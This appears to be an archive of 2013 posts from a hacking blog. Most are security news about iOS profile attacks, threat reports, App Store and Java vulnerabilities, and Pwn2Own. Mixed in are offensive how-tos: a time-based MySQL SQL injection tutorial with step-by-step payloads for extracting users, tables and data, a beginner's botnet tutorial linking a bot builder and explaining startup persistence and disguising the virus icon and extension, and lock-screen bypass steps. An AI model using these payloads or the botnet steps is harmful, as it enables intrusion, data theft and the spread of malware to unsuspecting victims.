A file known as mobileconf is being attacked due to this vulnerability. This file is used by phones carriers to configure system-level settings including WiFi, VPN, email and APN.

Skycure's CEO, Adi Sharabani, has taken the exploit to a test drive to explain how an iPhone can be controlled while retrieving victim's location and other sensitive information.

Ways to get infected:

Victims browse to an attacker-controlled website, which promises them free access to popular movies and TV-shows. In order to get the free access, “all they have to do” is to install an iOS profile that will “configure” their devices accordingly.
Victims receive a mail that promises them a “better battery performance” or just “something cool to watch” upon installation.

To avoid this attack one must follow these rules:

You should only install profiles from trusted websites or applications.
Make sure you download profiles via a secure channel (e.g., use profile links that start with https and not http).
Beware of non-verified mobileconfigs. While a verified profile isn't necessarily a safe one, a non-verified should certainly raise you suspicion.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013

2013-03-13T00:30:00.000-07:00

One thing I love more than writing is online threat reports - all the blood, sweat and tears combined with the satisfaction of discovery and elimination of the threat. Ahh! The moment you come to the realisation that there are smarter people in this world who can shoot you point-blank without ever being caught. Yes, brutality is the name, the name of the game!

WebSense has kept up to speed in this game and they have released a report to show for it. WebSense has released the 2013 Threat report enumerating an analysis on cyber threats. According to WebSense, cyber threats have increased over the years due to usage of ancient security protocols. Attackers are able to easily bypass these mechanisms and target mobile platforms and social media, the two most celebrated inventions of this century.

Internet has been reported to be the 'attack vector and the primary support element of other attack trajectories'. Malicious websites have grown in number (almost 600%) and 85% of these are being hosted by legitimate but compromised providers.

Genre of sites that were mainly attacked were:

Information Technology
Business and Economy
Sex
Travel
Shopping

Probably because attackers wanted to cover all areas of human psyche and, in general, life? No wonder the number of threats and attacks have increased.

- Social Media was one of the most exploited channels due to its large audience. Most of the links consisted of malicious content which were spread through the network. New features and interfaces also resulted in some amount of confusion leading to successful attacks on the user.

- Mobile Platform were again easily attacked due to jailbreaking, and download and installation of malicious apps.

Legitimate apps were also a cause for concern; many proved less secure than expected. Consider a study by Philipps University and Leibniz University in Germany involving 13,500 free apps downloaded from Google Play. Researchers found that 8 percent of these apps were vulnerable to man-in-the-middle attacks, and approximately 40 percent enabled the researchers to capture credentials for American Express, Diners Club, Paypal, bank accounts, Facebook,Twitter, Google, Yahoo, Microsoft Live ID, Box, WordPress, remote control servers, arbitrary email accounts, and IBM Sametime, among others.

WebSense stated that malicious apps mainly require three permissions:

82% of malicious apps send, receive, read or write SMS message.
12.5% malicious apps require RECEIVE_WAP_PUSH permission.
10% malicious apps asked for permission to install other apps.

- Email was another vector that took to WebSense's notice as only 20% of the emails sent and received were legitimate. 80% were phishing and spam emails. It is very easy to fall pry to such attacks because the links present in these emails seem to be from "real people" but basically consist of links to compromised websites or the attachments present in them are infected.

Report also introduced "time-delay" attack, "in which embedded web links are kept benign until after traditional email security defences are bypassed".

According to WebSense the following categories of malicious web links are present in Spam Email:

Potentially Damaging Content | Suspicious sites with little or no useful content.
Web and Email Spam | Sites used in unsolicited commercial email.
Malicious Websites | Sites containing malicious code.
Phishing and other Frauds | Sites that counterfeit legitimate sites to elicit user information.
Malicious Embedded iFrame.

You can read the full report by WebSense which clearly states;

“Solutions that focus solely on mobile, email, web or otherwise can no longer be trusted to defend against complex, multistage attacks that can move between attack vectors.”

Wise friends, we are no longer... ALONE!

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Vulnerabilities Fixed in App Store Almost After A Year

2013-03-10T12:17:00.000-07:00

It is being reported that Apple has ignored its network's security for more than a year. A problem that a Google developer has pointed out.

Google Researcher, Elie Bursztein has stated on this blog that he had informed Apple of the security problems present in App Store that allowed attackers to steal passwords and/or install unwanted or expensive applications.
This was done by exploiting Apple's resistance to use encryptions when any iDevice logged into App Store. This allowed the attacker to intercept communication occurring between an online user's device and App Store and insert his own commands into the system.

The vulnerability could be exploited to carry out quite a few attacks on the user according to Elie:

- Password stealing: Trick the user into disclosing his or her password by using the application update notification mechanism to insert a fake prompt when the App Store is launched.

- App swapping: Force the user to install/buy the attacker’s app of choice instead of the one the user intended to install/buy. It is possible to swap a free app with a paid app.

- App fake upgrade: Trick the user into installing/buying the attacker’s app of choice by inserting fake app upgrades, or manipulating existing app upgrades.

- Preventing application installation: Prevent the user from installing/upgrading applications either by stripping the app out of the market or tricking the app into believing it is already installed.

- Privacy leak: The App Store application update mechanism discloses in the clear the list of the applications installed on the device.

Apple responded to Elie's reports by switching on HTTPS for App Store only last week after a year of stalling appropriate decisions.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

How To Dodge Android 4.1.2 Passcode Lock - Vulnerability Exploited And Explained

2013-03-08T13:04:00.001-08:00

Do you want to elude Note II's security even for a brief moment? With iOS 6.1.2 being owned by hackers, it was time that someone took a look at Android's vulnerabilities.

The method that we are going to explain to you to bypass Android's security was found by Terence Eden on Samsung Galaxy Note II running Android 4.1.2. It allows users to temporarily get around the phone's lock screen without a password.

You can by-pass iPhone, iPad or iPod's security by following the steps given below:

1. Make sure your device is locked.

2. Activate the screen.

3. Enter "Emergency Call".

4. Tap on the "ICE" button found on the bottom left.

5. Press and hold the home button for a few seconds and then release it.

6. The phone's home screen will be displayed.

7. While the home screen is visible click on any app or widget and it will launch without the password.

You can view messages or emails via this method briefly. It has also been reported that not all apps are vulnerable to this exploit.

Disclaimer: We request our readers to attempt the above hack at their own risk and for their own knowledge.

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

The Rise Of Ethical Hackers - Let The Bounty Hunting Begin!

2013-03-07T07:15:00.001-08:00

Well, well well! It seems like our own favourite ethical hacker, Rafay Baloch, is about to meet the clan with whom he shares his talents! If you still haven't figured out who R.B is, please do your homework before falling in love with us! (yes, I said it!)

Security researchers and ethical hackers are massing up in Vancouver at the CanSecWest conference this time of the year. The crowd is going to be equipped and ready to hunt down every vulnerability possible in Chrome, Internet, Explorer and Java (good riddance since Java has attacked over and over again since 2013 began). And in doing so, they will be able to bag generous cash prizes.

Pwn2Own is organising the event offering over half a million dollars in cash prizes for anyone who successfully attempts to ethically hack a selected target.

The rules are simple:

1. Vulnerability has to be previously unknown.
2. Computers should be running fully patched versions of Windows 7, 8 and OS X Mountain Lion
3. A full sandbox (if present) escape is required to win.

Rules and Regulations from Pwn2Own can be found on their link.

The list of targets and the cash prizes to be won are:

Web Browser

Google Chrome on Windows 7: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
Microsoft Internet Explorer, either:

IE 10 on Windows 8: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000), or
IE 9 on Windows 7: $75,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)

Mozilla Firefox on Windows 7: $60,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
Apple Safari on OS X Mountain Lion: $65,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)

Web Browser Plug-ins using Internet Explorer 9 on Windows 7

Adobe Reader XI ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
Adobe Flash ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
Oracle Java ($20,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)

On the other hand, Google is arranging its own competition with the name of Pwnium 3. Pwnium 3 focuses on finding vulnerabilities in Chrome OS and is offering a more-than-generous $3.14159 million is reward. This particular competition will be based on Samsung S5 550 Chromebook running the latest version of Chrome OS. You will need to successfully exploit the browser or system of the device logged in as a guest or a user or "compromise with device persistence - guest to guest with interim reboot, delivered via a webpage."

Our readers should take in notice to upgrade and update their systems with the latest versions of softwares to stay safe from cybercrimes and attacks.

Ethical hacking has been on the rise since bounty hunters tend to look for every possible way to attack a system to earn their much deserved prize money. Therefore, many International companies are encouraging hackers to join them in their pursuit for safe and secure softwares, programs, systems and the like.

Our own bounty hunter and ethical hacker Rafay Baloch has done so many a times and has been awarded with prize money from PayPal, job offers from big-shot companies and cell phones from Nokia. A proud people we are!

Rafay Baloch and his team members (including I) have made it our mission to spread awareness regarding Ethical Hacking and its advantages. Believe us people, its always better to do the right thing and get paid, then do the wrong one and get caught.

Let the hunting begin!

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Java Zero-Day Vulnerabilities Fixed By Oracle

2013-03-06T12:20:00.002-08:00

We recently reported two Java zero-day vulnerabilities that were spotted in the wild by FireEye now identified as the CVE-2013-1493 and CVE-2013-0809. One of these (CVE-2103-1493) was exploited by hackers to install McRat, an executable file, onto the user's machine and was therefore found to be more critical than the other.

These vulnerabilities were reported to the company and were expected to be fixed in April's Critical Patch Update. But active exploitation of the above stated vulnerabilities has driven the company to roll out an Emergency update.

The company intended to include a fix for CVE-2013-1493 in the April 16, 2013 Critical Patch Update for Java SE (note that Oracle recently announced its intent to have an additional Java SE security release on this date in addition to those previously scheduled in June and October of 2013). However, in light of the reports of active exploitation of CVE-2013-1493, and in order to help maintain the security posture of all Java SE users, Oracle decided to release a fix for this vulnerability and another closely related bug as soon as possible through this Security Alert.

Previously, we suggested our users to uninstall Java if they didn't wanna be preyed upon via the McRat executable file but Oracle has been kind enough to provide us with a more suitable option to install the new version of Java or autoupdate it.

Desktop users should also be aware that Oracle has recently switched Java security settings to “high” by default. This high security setting results in requiring users to expressly authorize the execution of applets which are either unsigned or are self-signed. As a result, unsuspecting users visiting malicious web sites will be notified before an applet is run and will gain the ability to deny the execution of the potentially malicious applet. In order to protect themselves, desktop users should only allow the execution of applets when they expect such applets and trust their origin.

We would request our readers to update their versions of Java as soon as possible to refrain from being attacked. As they say, 'Prevention is better than cure'!

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

MySQL Injection Time Based

2013-03-06T02:20:00.003-08:00

We have already written a couple of posts on SQL Injection techniques, Such as "SQL Injection Union Based", "Blind SQL Injection" and last but not least "Common problems faced while performing SQL Injection", However how could the series miss the "Time based SQL injection" technqiues, @yappare has came with another excellent post, which explains how this attack can be used to perfrom wide variety of attacks, over to @yappare.

Hey everyone! Its another post by me again, @yappare. Today as I promised to our Mr Rafay previously that i would write a tutorial for RHA on MySQL Time based technique, here's a simple tutorial on MySQL Time Based SQLi, Before that, as usual here are some good references for those interested in SQLi

http://technet.microsoft.com/en-us/library/cc512676.aspx

and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet

OK back to our testing machine. In this example,I'll use OWASP WebApps Vulnerable machine.

Tested on Peruggia application.

Lets gO!

Previously, we already knew that in this parameter, pic_id is vulnerable to SQLi. So,let say we want to use Time Based Attack to this vulnerable parameter,here what we are going to do.

But first,do note that in MySQL, for Time Based SQLi, we are going to use SLEEP() function.

each DBMS have different type of function to use,but the steps usually quite similar.

In MSSQL we use WAITFOR DELAY

In POSTGRES we use PG_DELAY()

and so on..do check it on pentestmonkey cheatsheet :D

Back to our testing. So lets try to check either Time Based Attack can be done on the parameter or not.

Test it using this command

pic_id=13 and sleep(5)--

As we can see from the image above, there's a different between the requests. The 1st one is a normal request where the response time is 0 sec. While the 2nd request I include the SLEEP() command for 5 seconds before the server response. So from here we know that its can be attack via Time Based as well.

Lets proceed to check the current user.

Here's the command the we are going to use

pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)--

Where from the query, if the current user's 1st word is equal to 'a', the server will sleep for 5 seconds before responding. If not,the server will response at its normal response time.Then you should proceed to test with other characters.

From the image above,clearly we can see that the 1st and 2nd request, the server responded at 0 second. While the 3rd request,the server delayed for 5 seconds. Why?

Because the 1st character of the current user start with 'p'.. not 'a' or 'h'

Then you can proceed to check for its 2nd character and so on.

pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)--

pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)--

so on..

So go on with table_name guessing.

pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)

The 1st request is FALSE,because the server response is 0 second.There's no table_name=user exist then.

While the 2nd request,the server delayed for 5 seconds,so a table_name=users do exist!

How about guessing the column_name?Its easy.

pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)

See the image above?Still need any explanation? I bet you guys already understand it! :D

Get the data mode!

pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--

So,if the 1st character of data at the right column_name in the right table_name = 'a', the server will delayed for 5 seconds.

And then proceed to test the 2nd,3rd char and so on..

The image shown that the username=admin..so is it correct?lets double check it

Yeahhh.its correct.

That's all for now!

Thanks,

@yappare

How Hackers Make Botnets To Infect Systems [Part 2]

2013-03-04T14:10:00.000-08:00

Hello RHA readers, we are back with How To Setup A Botnet [Tutorial For Noobs] [Part 2]. Those who haven't read previous part than check the first part in order to understand part two, as it is the sequel of How to setup a Botnet.

Part 1: How To Setup A Botnet [Tutorial For Noobs] [Part 1]

So in this part we will teach you how to setup a Botnet.

Step 1:

Now after hosting the server, Extract Bot builder in you computer.
Download it from here http://www.mediafire.com/?hb9ou6g50a620nb

Step 2:

After extracting, you'll a application for BOT Building with 'VNBuilder' name.
Run the application.
It would be like as shown in image:

step 3:

Check the box in the below.

Step 4:

Now go in the 'Web Setting' Tab. Type the website where you have set your server in ROOT WEBSITE URL column. Remember your website url should be like www.yourwebsite.com this, No Http:// in starting. Leave the port number as it is. Now type the folder in which your server is set, And it should be like /folder name/. leave All other thing as it is. As it is shown in image:

Step 5:

Now Go to Load settings tab, check the 'INSTALL LOADER TO START UP' option. Like in the image:

Step 6:

Proceed to last Tab BUILD LOADER, Now if you want to change icon of your virus than go to top right of under build loader tab, You can add icons their for your virus, additional icons are given with builder. You can even change the extention from .exe to .bat and few others, In the bottom of window you can find option to change extension. Now In the last click Build.
Builder will ask where to save with which name, provide your desire one.

Step 7:

You've successfully created Bot. Now in order to check whether the bot is working or not RUN it in you Computer, Turn your antivirus It'll detect the virus. After running virus, go and login in the server you made in part one of this tutorial. If your virus is created Successfully than you IP will be appearing in the server list with your computer name. Like mine:

If your Ip appearing, than you have configured Botnet successfully. Congratulations.
Thanks for reading, Stay tuned with us for more tutorials!

About The Author

This article has been written by Fahad awan, Who has recently joined RHA's team, We wish him best of luck and hope that he enjoys working for RHA.

Another Java Zero-Day Vulnerability Spotted In The Wild

2013-03-04T00:06:00.000-08:00

So, you thought you were out of the woods with Java? Bad news. You aren't. Another Java zero-day vulnerability has been found in the wild by FireEye.

Java v1.6 and Java v1.7 Update 15 on browsers are being targeted this time around. The previously unknown and unpatched vulnerability exploits browsers to install a remote-access trojan named McRat.

McRat is a Windows Trojan therefore Windows users are prone to such an attack. It is not clear whether Mac and Linux users are at risk as well.

According to FireEye researchers;

We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to 'High' and do not execute any unknown Java applets outside of your organization.

If you are a Windows user and fear such an attack, we would suggest an uninstallation of Java because, as yet, there are no solutions to this problem.

The next security updates are scheduled for 16th April but Oracle will be forced to push an Emergency update in the light of current events.

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.